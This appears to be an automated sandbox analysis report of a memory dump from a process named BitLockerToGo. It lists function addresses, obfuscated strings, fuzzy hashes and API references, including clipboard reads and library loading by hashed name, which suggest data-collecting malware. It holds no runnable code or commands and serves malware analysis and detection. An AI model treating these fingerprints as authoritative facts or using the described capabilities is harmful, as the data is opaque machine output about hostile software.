Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: bc07845a66b7b397d9267a31ac253d5a221545e8642a53ebcb7cd5afc582a721
Instruction ID: ed97c90ac1c9c2c9ee2240c398594e9635d571ab3a759ba4ba5a524b9f683e5c
Opcode Fuzzy Hash: bc07845a66b7b397d9267a31ac253d5a221545e8642a53ebcb7cd5afc582a721
Instruction Fuzzy Hash: 4AC08C20898208A7E2102B2DAD0AF62392C9703766F800322F9A4804C16E521524C2F2

Non-executed Functions

Function 0297F467 Relevance: 32.4, Strings: 25, Instructions: 1192COMMON

Download Yara Rule

Strings

lmn(, xrefs: 0297FC3B
HIJK, xrefs: 0297FBD8
efg`, xrefs: 0297F647, 0297F653
456p, xrefs: 0297FCA9
tuvw, xrefs: 0297FBF9
()*+, xrefs: 0297FCE0
X, xrefs: 0297FCF6
{zy?, xrefs: 0297FCBF
`abc, xrefs: 0297FC1A
k-./, xrefs: 0297FCEB
hijk, xrefs: 0297FC30
w123, xrefs: 0297FC9E
xyz{, xrefs: 0297FC04
XYZ[, xrefs: 0297FBAC
X, xrefs: 0297FEE2
cba`, xrefs: 0297FCD5
#"! , xrefs: 0297FC25
Tu59, xrefs: 0297FE69
PQRS, xrefs: 0297FB9C
ONML, xrefs: 0297FC88
pqrs, xrefs: 0297FBEE
DEFG, xrefs: 0297FBCD
!"#, xrefs: 0297FCCA
LMNO, xrefs: 0297FBE3
\]^_, xrefs: 0297FBB7

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: !"#$#"! $()*+$456p$DEFG$HIJK$LMNO$ONML$PQRS$Tu59$X$X$XYZ[$\]^_$`abc$cba`$efg`$hijk$k-./$lmn($pqrs$tuvw$w123$xyz{${zy?
API String ID: 2994545307-861201060
Opcode ID: 67cdec164f64d4a776812bcb3f214aeb9e3aa1530de3411494a7910192865bdf
Instruction ID: 1e97d1f9ee734266b7dc2a35934627045a62ee8b680654e718ec78e9670ec360
Opcode Fuzzy Hash: 67cdec164f64d4a776812bcb3f214aeb9e3aa1530de3411494a7910192865bdf
Instruction Fuzzy Hash: 05A268B16083819BD730DF14C890BAFBBE5BFC5744F54892CE6C99B291E7749808CB96

Function 02991FE0 Relevance: 22.2, APIs: 2, Strings: 10, Instructions: 1195libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(C956CB53,00000000,00000800), ref: 02992E69
FreeLibrary.KERNEL32(?), ref: 02992F77

Strings

qulf, xrefs: 0299209B
%<?2, xrefs: 02992159
::!8, xrefs: 02992163
?sj_, xrefs: 02992145
JhZr, xrefs: 02992BC1
t`{c, xrefs: 029920AF
KmN#, xrefs: 0299214F
=e((, xrefs: 0299213B
|_+&, xrefs: 02992177
R" *, xrefs: 029928C4

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: Library$FreeLoad
String ID: %<?2$::!8$=e(($?sj_$JhZr$KmN#$R" *$qulf$t`{c$|_+&
API String ID: 534179979-2662572573
Opcode ID: 2499319f81fa957968451af19dddb56a0ec938f72d1b5b9cd31134938eb8c93a
Instruction ID: 7db168fcf57c2a25f3d41e2ba10313057a9d4b6d8b9ae9262eb9b6a80ca61aaa
Opcode Fuzzy Hash: 2499319f81fa957968451af19dddb56a0ec938f72d1b5b9cd31134938eb8c93a
Instruction Fuzzy Hash: A2927F70805F819AEB21CF39C850BA7BBE5AF1B315F04099DD8EB8B282D735A445CF65

Function 0298E740 Relevance: 12.2, Strings: 9, Instructions: 912COMMON

Download Yara Rule

Strings

Ox, xrefs: 0298EA94
mmeh, xrefs: 0298F1BB
efg`, xrefs: 0298EE23
NDNC, xrefs: 0298F1A6
Sx, xrefs: 0298E99D
c, xrefs: 0298E9AB
tE, xrefs: 0298EC0D
v|v{, xrefs: 0298F1B4
4`[b, xrefs: 0298EE60

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$NDNC$Ox$Sx$c$efg`$mmeh$tE$v|v{
API String ID: 0-231150121
Opcode ID: eb7087394e4b2893ebda581de5293e2e6665ba7ed9092768f36cd8e291b71e3b
Instruction ID: b917540695b99ab6dbc27240470f821be3c770488132b52107f8186a65214692
Opcode Fuzzy Hash: eb7087394e4b2893ebda581de5293e2e6665ba7ed9092768f36cd8e291b71e3b
Instruction Fuzzy Hash: CF62ACB4D00219CFDB20DFA8D890BAEBBB1FF46304F5445A9E855AB381D730A955CF91

Function 02988D10 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 456COMMON

Download Yara Rule

Strings

V^, xrefs: 029892EB
47, xrefs: 029891EA
UZ, xrefs: 029892D3
8k9i, xrefs: 02989084, 0298908D
K_, xrefs: 029892E3

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 47$8k9i$K_$UZ$V^
API String ID: 0-2523940364
Opcode ID: 90c1d912638f65897d26219bf25046e13566ac932821817c347fd72032097a97
Instruction ID: 426ce49e072157e8801494ba06dd42355f06a91cc786c3c5798bfa56678985d9
Opcode Fuzzy Hash: 90c1d912638f65897d26219bf25046e13566ac932821817c347fd72032097a97
Instruction Fuzzy Hash: DB022DB0409380ABD310EF55DA90A2BBBF5EF86B48F484D1CF4899B251E375D905CBA7

Function 02961000 Relevance: 10.6, Strings: 7, Instructions: 1822COMMON

Download Yara Rule

Strings

0123456789abcdefxp, xrefs: 029615B3, 02961628
gfff, xrefs: 02962469
-, xrefs: 0296235A
gfff, xrefs: 0296241E
gfff, xrefs: 029623B3
0123456789ABCDEFXP, xrefs: 029615A5, 02961619
@, xrefs: 02963005

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
API String ID: 0-2517803157
Opcode ID: 030d39a50aeccfa29eec559d7868275b285e1c1b16a2d732161a0a65a7b7a5dc
Instruction ID: 37f5b506763d8f21f7366424e408e5ccfb559f2d5d5f3b5473a164b5166bd56a
Opcode Fuzzy Hash: 030d39a50aeccfa29eec559d7868275b285e1c1b16a2d732161a0a65a7b7a5dc
Instruction Fuzzy Hash: 22D2D371A083518FD714CF28C49877ABBE2AFC9714F188A6DF8998B391D374D945CB82

Function 0298ECF4 Relevance: 9.5, Strings: 7, Instructions: 705COMMON

Download Yara Rule

Strings

mmeh, xrefs: 0298F1BB
efg`, xrefs: 0298EE23
NDNC, xrefs: 0298F1A6
tE, xrefs: 0298EC0D
v|v{, xrefs: 0298F1B4
KM, xrefs: 0298F043
4`[b, xrefs: 0298EE60

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$NDNC$efg`$mmeh$tE$v|v{$KM
API String ID: 0-1041208609
Opcode ID: 97a4556d6c4e76f065b96010e2fbf1a4af1fe2d2fbeb5172822c2eb448cab821
Instruction ID: 1a3f5c90110141dad103e7fd07e7761d6a8dd6b804e6d47e982d9d2cf21a886f
Opcode Fuzzy Hash: 97a4556d6c4e76f065b96010e2fbf1a4af1fe2d2fbeb5172822c2eb448cab821
Instruction Fuzzy Hash: 2A22CFB4D00216CFDB20DF94C890BBEB7B1FF46304F584599E885AB381D735AA51CBA6

Function 0298EE86 Relevance: 9.5, Strings: 7, Instructions: 704COMMON

Download Yara Rule

Strings

mmeh, xrefs: 0298F1BB
efg`, xrefs: 0298EE23
NDNC, xrefs: 0298F1A6
tE, xrefs: 0298EC0D
v|v{, xrefs: 0298F1B4
KM, xrefs: 0298F043
4`[b, xrefs: 0298EE60

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$NDNC$efg`$mmeh$tE$v|v{$KM
API String ID: 0-1041208609
Opcode ID: 765bd77a14c35f15992e919c6fd4931a10423e12ebe98aee7c778f37200f3349
Instruction ID: cf088eb88775b59b1b0ee2a78902b29af4c59ad215506c1aba5b45fdac8aa847
Opcode Fuzzy Hash: 765bd77a14c35f15992e919c6fd4931a10423e12ebe98aee7c778f37200f3349
Instruction Fuzzy Hash: 8022CFB4D00216CFDB20DF94C890BBEB7B1FF46304F584599E885AB381D734AA51CBA6

Function 0298BF1C Relevance: 9.1, Strings: 7, Instructions: 393COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0298C210
efg`, xrefs: 0298C1C4, 0298C1CD
JC, xrefs: 0298C013
~K, xrefs: 0298BFFD
~v, xrefs: 0298C008
4`[b, xrefs: 0298C410
efg`, xrefs: 0298C3D3, 0298C3DB

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$JC$efg`$efg`$~K$~v
API String ID: 0-2068420110
Opcode ID: e509a0e467e13d372fd3316cc7cde21831c2dff02f39d79419bcf9f98d6ef333
Instruction ID: 7c4454e170e11177d04643367c6091bca608d6d32511ac89bce391f62ae01b39
Opcode Fuzzy Hash: e509a0e467e13d372fd3316cc7cde21831c2dff02f39d79419bcf9f98d6ef333
Instruction Fuzzy Hash: 14D164B190C340ABE720EF64E880B6EBBF5FB86344F548D2DE2C89A251D735D454CB62

Function 02998800 Relevance: 9.1, APIs: 6, Instructions: 118clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0299881F
GetWindowLongW.USER32 ref: 02998848
GetClipboardData.USER32 ref: 0299885A
GlobalLock.KERNEL32 ref: 02998879
GlobalUnlock.KERNEL32 ref: 0299895F
CloseClipboard.USER32 ref: 02998967

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: 013e15c372a14743da458870d51f28d3b3dc5b2f89df1eddf67ee99df6cfd4e7
Instruction ID: ea5bd75440f1516568b4d16d91a4ade281d595c95d95f1d3a12f0052f385a9e0
Opcode Fuzzy Hash: 013e15c372a14743da458870d51f28d3b3dc5b2f89df1eddf67ee99df6cfd4e7
Instruction Fuzzy Hash: 99414CB19083868EDF10ABBCD9487BEBFB0AB56220F044A6DE4E1A72D1D3354555C7A3

Function 0298A324 Relevance: 8.2, Strings: 6, Instructions: 712COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0298A120
PcR}, xrefs: 0298A170
efg`, xrefs: 0298A45A
4`[b, xrefs: 0298A820
efg`, xrefs: 0298A0E3, 0298A0EB
4`[b, xrefs: 0298A8C0

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$4`[b$PcR}$efg`$efg`
API String ID: 0-176531621
Opcode ID: 812159f3e8cd00188689057f3d068b4c3ee28fc1bba339adfb68e243f69789ea
Instruction ID: fc00d41585c966ff431fec09bc172f402b36105856526587807bbad1ffe15438
Opcode Fuzzy Hash: 812159f3e8cd00188689057f3d068b4c3ee28fc1bba339adfb68e243f69789ea
Instruction Fuzzy Hash: 9532C075D0020ACFCB20DFA8C990ABEB7B2FF49344F29845AD845BB361D7359951CBA0

Function 0296135B Relevance: 7.2, Strings: 5, Instructions: 941COMMON

Download Yara Rule

Strings

@, xrefs: 029636D5
0, xrefs: 029625B6
0, xrefs: 02961F05
i, xrefs: 02962A60
0, xrefs: 02961FDD

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$0$0$@$i
API String ID: 0-3124195287
Opcode ID: 2ea22e46caff4318fec955fb584b43b2a5e62d7ba2c4a4037c7743daf1882aa5
Instruction ID: 1d99498da847f1daa805e94340df5e30d11fc2c268a6474fd9382a5529a0e437
Opcode Fuzzy Hash: 2ea22e46caff4318fec955fb584b43b2a5e62d7ba2c4a4037c7743daf1882aa5
Instruction Fuzzy Hash: C872D071A0C3428FC315CF28C59876ABBE1ABC5748F188E6DE8D997391D374D949CB82

Function 02993024 Relevance: 7.0, Strings: 5, Instructions: 710COMMON

Download Yara Rule

Strings

efg`, xrefs: 029937EF
2, xrefs: 0299374A
1=!, xrefs: 0299311B
ESBT, xrefs: 029935D3
9:8, xrefs: 029931A8

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 1=!$9:8$ESBT$efg`$2
API String ID: 0-3227402009
Opcode ID: bee0f5cf4569620e143d09ee68eb2bc3519f2ee6125f86148c3cd3acc2266dfb
Instruction ID: 4cb9bf37348acdf7b18d02c155130daac17378e605c4c035ce4ccbab12117106
Opcode Fuzzy Hash: bee0f5cf4569620e143d09ee68eb2bc3519f2ee6125f86148c3cd3acc2266dfb
Instruction Fuzzy Hash: 9E328974508B818BEB26CF39C494BA2BBE1AF0B314F4849ADD4DB97782C736E505CB54

Function 0296139D Relevance: 6.6, Strings: 5, Instructions: 371COMMON

Download Yara Rule

Strings

0123456789abcdefxp, xrefs: 029613A7
-, xrefs: 0296207A
gfff, xrefs: 029620B7
gfff, xrefs: 02962096
0123456789ABCDEFXP, xrefs: 0296139D

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
API String ID: 0-3620105454
Opcode ID: a9e3de2409e5242ecbeb872b9d5186993d586318ce424a7bcf37a07a7e42a41e
Instruction ID: 74981fb09b784ba44aa89b371e4e5644729cc4a0ab3aa018e6c0f5392760ec15
Opcode Fuzzy Hash: a9e3de2409e5242ecbeb872b9d5186993d586318ce424a7bcf37a07a7e42a41e
Instruction Fuzzy Hash: 5DE17030A0D3928FC715CF29C49466AFBE2AFD5308F188A6DE8D987352D335D949CB52

Function 02992FA9 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 522libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(23B121B5,00000000,00000800), ref: 02993CBA

Strings

~PF=, xrefs: 02993E80

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID: ~PF=
API String ID: 1029625771-944997009
Opcode ID: 469083b00fb925c969f25aff0cb67d4f22ba2970633114eb459b382f326f9df6
Instruction ID: adace18c01a9b4773f98263467540540d26f18235ce3b93e6694ccc16f8d9e79
Opcode Fuzzy Hash: 469083b00fb925c969f25aff0cb67d4f22ba2970633114eb459b382f326f9df6
Instruction Fuzzy Hash: 2E02BD70505B408BEB218F39C890BE3BBE1BF56318F54099DE4EB9B682C736A405CB65

Function 02999341 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0299938F
GetSystemMetrics.USER32 ref: 0299939E

Strings

, xrefs: 02999472

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 8bcf6f4c7f2aaee8241e2aa7151fd31c7d46249ceda2c52f77cd759313b06530
Instruction ID: 8e2e140a518a9d0f50fec46cf71167c7e4a7857b932efa0af14d0ca63cde866c
Opcode Fuzzy Hash: 8bcf6f4c7f2aaee8241e2aa7151fd31c7d46249ceda2c52f77cd759313b06530
Instruction Fuzzy Hash: 945182B4D152089FDB40EFACD985AADBBF0BF48300F118529E898E7350D735A955CF82

Function 02980F10 Relevance: 4.5, Strings: 3, Instructions: 727COMMON

Download Yara Rule

Strings

LO, xrefs: 029811A3
$%, xrefs: 029814F3
hw, xrefs: 02981055

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $%$LO$hw
API String ID: 0-466875633
Opcode ID: c9f3b8d745e7933f36b001eebca3932a1a7416897b4464235f9e77854573323f
Instruction ID: 9110b62a76b39fbaf7ec293db715d962f7913626e073b0c981cdfdd6ee69ebfa
Opcode Fuzzy Hash: c9f3b8d745e7933f36b001eebca3932a1a7416897b4464235f9e77854573323f
Instruction Fuzzy Hash: 793296B59083409BC711EF28D890A2EBBF5EF96744F08892CE4C98B351E739C915CB96

Function 029687C0 Relevance: 4.2, Strings: 3, Instructions: 425COMMON

Download Yara Rule

Strings

), xrefs: 0296883C
), xrefs: 02968846
IEND, xrefs: 02968C3C

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: 912a2740e76f288415285152ad40dffc42b55e92147c14c5a2a84e5e3bbb922b
Instruction ID: ae1d6e58f8a10b97f95febc7df5cc35859251e76c636e63a22f642f89629d1e3
Opcode Fuzzy Hash: 912a2740e76f288415285152ad40dffc42b55e92147c14c5a2a84e5e3bbb922b
Instruction Fuzzy Hash: 6DF1D3B1A08751AFD310CF28C85876ABBE1BF94314F044A2DE9A59B381D775E918CBD2

Function 02987450 Relevance: 4.2, Strings: 3, Instructions: 423COMMON

Download Yara Rule

Strings

efg`, xrefs: 02987873, 0298787B
4`[b, xrefs: 029878B0
<="#, xrefs: 0298768A

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$<="#$efg`
API String ID: 0-1928303999
Opcode ID: b9fab0cfb0833305d70a81002e0c571564dd9350b99668ffe439a707640320c1
Instruction ID: 86daf91d75dadd73d8242b41d57d107bad00500a63c54758ed56fedfb552562b
Opcode Fuzzy Hash: b9fab0cfb0833305d70a81002e0c571564dd9350b99668ffe439a707640320c1
Instruction Fuzzy Hash: D7C1BF795083009BD711EF98C891ABBF7F9EF86354F28491CE4D59B251E335D904CBA2

Function 029A4D00 Relevance: 3.2, Strings: 2, Instructions: 669COMMON

Download Yara Rule

Strings

efg`, xrefs: 029A4D74, 029A4D7D
f, xrefs: 029A4ED6

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: efg`$f
API String ID: 0-1150721270
Opcode ID: 45a43c62c4706989e79e36f262a40fabc1cdbce507a28fc38d2736b10b26f9ec
Instruction ID: 3f4ee1c02f49a4bf1441ae985cf947652d346aa966d9a7933364b85078f5633e
Opcode Fuzzy Hash: 45a43c62c4706989e79e36f262a40fabc1cdbce507a28fc38d2736b10b26f9ec
Instruction Fuzzy Hash: B522CE71A0C3419FC715CF18C8A0B2AFBE6AFC8318F598A2DE49997391D775D844CB92

Function 02974166 Relevance: 3.0, Strings: 2, Instructions: 470COMMON

Download Yara Rule

Strings

*, xrefs: 02974FE3
e{, xrefs: 02974F7B

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: *$e{
API String ID: 0-248662316
Opcode ID: 35831e5ae96b2c2107d385c5296cb3e73736873bc0fd939b43166f4aeec8ceb6
Instruction ID: 5704946c5c8544ecdfaa74bc11195e4213a5f1f8941c7abbd02989fad61d10fc
Opcode Fuzzy Hash: 35831e5ae96b2c2107d385c5296cb3e73736873bc0fd939b43166f4aeec8ceb6
Instruction Fuzzy Hash: D5F1DAB1908380DFD715DF68D89472FBBF6AF86354F19482CE48987292E771D844CB92

Function 0297E669 Relevance: 2.9, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

r]Z[, xrefs: 0297E956
D, xrefs: 0297EAE3

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: D$r]Z[
API String ID: 0-150308939
Opcode ID: 79060900de88ef41ffca0845cd8ffd658082450dd8fbf894b894a696cd6a6e18
Instruction ID: 31f69b94ad3f9d566e26fb44b9f63e764139985a75b855a4c76a2530de874a81
Opcode Fuzzy Hash: 79060900de88ef41ffca0845cd8ffd658082450dd8fbf894b894a696cd6a6e18
Instruction Fuzzy Hash: 1ED166B4908381CBD720DF24C891BABB7F5FF85359F14895CE9C98B290E774A805CB92

Function 02963770 Relevance: 2.9, Strings: 2, Instructions: 403COMMON

Download Yara Rule

Strings

NaN, xrefs: 029637D6
Inf, xrefs: 029637CF

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: Inf$NaN
API String ID: 0-3500518849
Opcode ID: eb5242ea5fa22ec3e5983f290c2b5c2ac169b65e4324423bc3710cf13133b912
Instruction ID: 968d7df4176d286e135071059b63f235821004b1018f9c5878373935c3b3b291
Opcode Fuzzy Hash: eb5242ea5fa22ec3e5983f290c2b5c2ac169b65e4324423bc3710cf13133b912
Instruction Fuzzy Hash: 56D1D372A083129BC704CF28C98466AB7E5EFC8B54F158E6DE89997390E735DC05CBC6

Function 029A90F0 Relevance: 2.9, Strings: 2, Instructions: 402COMMON

Download Yara Rule

Strings

P, xrefs: 029A9297
EZ[X, xrefs: 029A9413, 029A941B

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: EZ[X$P
API String ID: 0-2027203311
Opcode ID: db8a22122b4b7ce0ac41aec432471088fd88e344d729ec155e33b59254673b07
Instruction ID: 30429b5e98b6c5a2254bc879e51d6e960384fab08c5535d932963f26b5df62fd
Opcode Fuzzy Hash: db8a22122b4b7ce0ac41aec432471088fd88e344d729ec155e33b59254673b07
Instruction Fuzzy Hash: 79D1C67290C3648FD726CE1894A072FB6E5FB85758F168A2CE8A5AB380CB71DC05C7D1

Function 0298C720 Relevance: 2.9, Strings: 2, Instructions: 367COMMON

Download Yara Rule

Strings

efg`, xrefs: 0298C753, 0298C75B
yjUF, xrefs: 0298CAAE

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: efg`$yjUF
API String ID: 2994545307-2681823704
Opcode ID: 0e65b7fc847253beec43c1cc9b52d7cad8d3c4af52b4e95ea9172ad93b6c5c1c
Instruction ID: 9888b3c3bc54ec71a6df859d61e9ab1c95b2b1b8847455b4e8df8d8e126ae536
Opcode Fuzzy Hash: 0e65b7fc847253beec43c1cc9b52d7cad8d3c4af52b4e95ea9172ad93b6c5c1c
Instruction Fuzzy Hash: 84B1F071A083018BD718EF28D880B3BB7E6EF85354F18496EE5D59B391E331D904CBA2

Function 0297DCD0 Relevance: 2.9, Strings: 2, Instructions: 363COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0297E130
u'd!, xrefs: 0297DFE7, 0297DFF3

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$u'd!
API String ID: 0-965411109
Opcode ID: c14e73a2f5ab58e54052b28dde2da555e20d255200bf01ef4c044ccaee256fd5
Instruction ID: 9f1d513d2b5439f7aa9599236306976ff871ce74e04ee297c24c9e1dea1aed81
Opcode Fuzzy Hash: c14e73a2f5ab58e54052b28dde2da555e20d255200bf01ef4c044ccaee256fd5
Instruction Fuzzy Hash: AEB1AFB55083809BD730DF24C851BABB7F5FF8A319F04495CEA9A8B291E7359800CB66

Function 02969D78 Relevance: 2.8, Strings: 2, Instructions: 310COMMON

Download Yara Rule

Strings

8, xrefs: 02969F03
0, xrefs: 02969F0B

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: f25904b02f137daec9c723274841f0ec173c55a4e84c701f66f9b17f97ea6ac8
Instruction ID: 13d5526b4560bdf63a5d7cb83f80a21b0990ffc5b675e4a3390e6a1730d89cde
Opcode Fuzzy Hash: f25904b02f137daec9c723274841f0ec173c55a4e84c701f66f9b17f97ea6ac8
Instruction Fuzzy Hash: 56D14231A0C381EFD3058F28C844BAFBBE1AB8A354F048D6DF98987291D375D958CB52

Function 02996C90 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 02996ED7
U, xrefs: 02996E0E

Memory Dump Source

Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081$U
API String ID: 0-3552884152
Opcode ID: 070116941b6cecb723c00a70f5aa2d5a5ac0bb4257f8f7c9ab0e3bae474ecb62
Instruction ID: 105f9e34e7143e1c15343d3573515e187b61bc83dc3ba4ff14a08d5b70f247d6
Opcode Fuzzy Hash: 070116941b6cecb723c00a70f5aa2d5a5ac0bb4257f8f7c9ab0e3bae474ecb62
Instruction Fuzzy Hash: D171233664D6908BDB29893C982037ABE9A4FC2234F2D8F6DE5F28B3D1D266C411C351

Function 029A8650 Relevance: 2.7, Strings: 2, Instructions: 176COMMON

Download Yara Rule

Strings

4`[b, xrefs: 029A8800
EZ[X, xrefs: 029A86F3, 029A86FB

